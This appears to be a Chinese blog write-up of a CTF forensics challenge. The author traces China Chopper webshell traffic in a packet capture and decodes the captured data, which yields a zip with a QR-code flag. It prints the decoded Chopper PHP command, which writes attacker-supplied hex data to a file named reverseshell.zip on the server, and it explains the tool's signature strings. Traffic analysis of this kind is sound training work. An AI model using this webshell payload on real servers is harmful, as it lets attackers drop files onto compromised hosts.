【WEB】BackDoor Dear 丶 2022-05-15 04:35 89阅读 0赞 ![70][] -------------------- 下载数据包,发现有菜刀连接的痕迹。 怎么知道的,看数据包吧。追踪tcp流发现连接的痕迹。 右键,追踪tcp流,发现两个加密后的字符串 ![这里写图片描述][70 1] 对字符串进行base64解密,发现菜刀的特征字符: ![这里写图片描述][70 2] 解密后是这么一段特征字符: @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\uploads\\reverseshell.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die(); 怎么判断是菜刀?知识补充: 1. 先用@ini\_set(“display\_errors”,”0”);临时关闭PHP的错误显示功能 2. @set\_time\_limit(0);防止像dir、上传文件大马时超时 3. @set\_magic\_quotes\_runtime(0);关闭魔术引号,这东西在4.0以后就不怎么用了 4. echo(“->|”);没啥好说的 5. print(“hello PHP!”);输出字符串 6. die();人如其名 其他的指令也是同一个道理了。 好了,我们继续,发现是利用菜刀控制服务器,找到加密后的字符: ![70 3][] 复制如下: 504B0304140000000800288DC34C58BD2C542C0500002C0700000E000000313532383031383837352E706E676D956D54926718C7B12C4D33ED45CD94B034E9D4C9B6F2A5D4503B1A5A274CB1B2E341A798D35EA82D4D110173B9AD48C8B9B2A395A5A8684C84694D54B0B65646BA91C0A333C2487C8530ECE909151C7E4BE19CDFFD7CB8CF7D5FE77F5FD7F5BF9E2B47306807BB0D763018CC213A2A220E06B35A3FBF6C9798766CD59401186CF9547444787CEE6D8D3C96FE6ECFCA659D3DA95AAAEACD52F6CAA8412F955F03CA66DF43E550386C0BB652A15020EE0D570E2C2D10865DF7FC9241854A484155BEFD4E7D8B2DD1865E52B1EE1A67C488E3A6CFEF7C63B62B42C4ACB3397DA01016BE80826C3D69EC8E74A44B790E0B12E71834460DAAA09A94BDAE45A1F79AFDDA2BFCB26778C1177486EB49F582C84709FFB2013AF4A019744C64DF105E28FB081AF702D4CBA1E9DE3F3B79DB7E09EBA65031C67AF19A8B20F2BCE512728D406AC8C3517E715BB1C47A21C6747D5B3D1485436BB5D1C06903E7A499DA79C1E341AFC01BC5CAEDB0987297FC727AAD667D58EFF8B16755BD20E22DC36DC5E6454157BD5050B31FE5A3F1F0A5B9D3EFAA00A36D779493E74226897FF6F45FED7210A3CBE4817B0BE8FBE4871D6684347385C3E5A3819A0139878BD9F8208F999071F7B593A187E4FF5B98074E76CDDAAA7021525D4E07A18F3B95A363F54EB400B58EC1C422EECD51508422EF4C5F982413197BA7752C425FEC34BB8C490BE671722288711E09860A78A286E5D8F9FEDC2D1F33DD5F411B220D4C71570F6A06CA1BD9EE5E7A07AC40A9D35CEF07ED5E636DBB90663F71657E7155639F7A384FC4F42AC54D069F5295C624BA6E5A1CB8C9971AE3125D7635F1090D08E19F3124C1C7491A48EA1A40F74D6C2FF1DD3F99B4E89D366D42DA3E35C38E078FD4545BA919E379C9FA6AA516ECF8548AB868A1CE28B87424AF98572F49F2E864A6DECFFF1E82C4EB7D84FD7452266549B1B5D979192776DD71F7719A33DCDEFE703781DE782299B3B5BC1D48739C9978699694264AB17270CEF1624D6B92CF1BE83F253864BF0BDF62ACF599469B1F3E7FFE4735B8DCEFA9306403157BA18AFC1439F93105098181E00411699E448FDB9B667A367E02D02DD426B5D879DCA083E63EB7D975CF01F1BF86A69A9BEB876164A9212CE8FDD1D0632D99100496E7F6B636E283479103C21093B70A16798B3F2B8FDDDCFE2660DAC1F92DD74AE20FBA55CEA623735A2A4A3C17B97DDEF046371EBCAE3CA0E30057D21C72D44FFFEAA0BC2F351D61AE3ABE6274A7545452BA654C799271F01160DF7D088E76F1C0A5E8EA6A684EED65161C9E193C0556631427EA1A2BCE5C6E8E6F3F4EE690D79A47668B14A5D211BA08F3FE3961DBF300693D64D344E500379990146DEEDEF959C3F636A4093F0F64C94E61C1563C2E8527D60FA13E18ACDA2F99F78989866F9F63F8145606F931132F9DB853DD909CA2CB559263A05D96B28763BB07C03FF66749329F3D7000FF0E021847C99A354F045D96065FABEF7EB420437BA14322E08C71F3C54087242BE4C96A8B4527E13ECCF6D69276F867CB76DEDD7104D1C9CCA18F5F31572C53696BBA5EE0B94654FF2CD334CAB01F72E61ECB62C49A3D9C8794223A72127FA0D076718FE8A038ACB66415B8ED6CEF4F9A0CA1E96A1A6FAB826974BE65A9ECF7F8F42C1C79D9601B5F7AA63C24E153C62582EEA552E9BED642774F822A2DF9305985FCE7FAD96DD181FE32E28868F521708B93851E1129929B0FF1EBB93D436BFFA05C256011350691E021BEC4FC91A6890A044EB9F86B8C465FB8CD3046F697A215303EBB66BD7AD15CA80C3DF2AAC88243E7952176AF6B886B2408969BFE82B0E8484C44E3FE6F0AFF07504B01021400140000000800288DC34C58BD2C542C0500002C0700000E0000000000000000002000000000000000313532383031383837352E706E67504B050600000000010001003C000000580500000000 发现是十六进制的,使用notepade++进行转换: ![这里写图片描述][70 4] 选择插件》16进制转assci ![这里写图片描述][70 5] 最后转化为一段乱码: ![这里写图片描述][70 6] 将他另存为zip: ![这里写图片描述][70 7] 打开,扫面二维码就拿到flag! [70]: /images/20220515/3936e724b3044e099497f0b14ef62956.png [70 1]: /images/20220515/3cdf0c936b2548c1a12be1c4f459f0e3.png [70 2]: /images/20220515/61a1d3969c1f46fdae88e0ea1bb1ecb0.png [70 3]: /images/20220515/8e5a8c25a28f4e21bed76b147cb2cd7b.png [70 4]: /images/20220515/a0566c0944694d1b8bcb493c83660a6f.png [70 5]: /images/20220515/fd273ac6041046f6ac58a3b39739e453.png [70 6]: /images/20220515/6446a24a2892456287805e75c18c6d05.png [70 7]: /images/20220515/27a264a0efec4996b2aaa23761fa74e1.png
还没有评论,来说两句吧...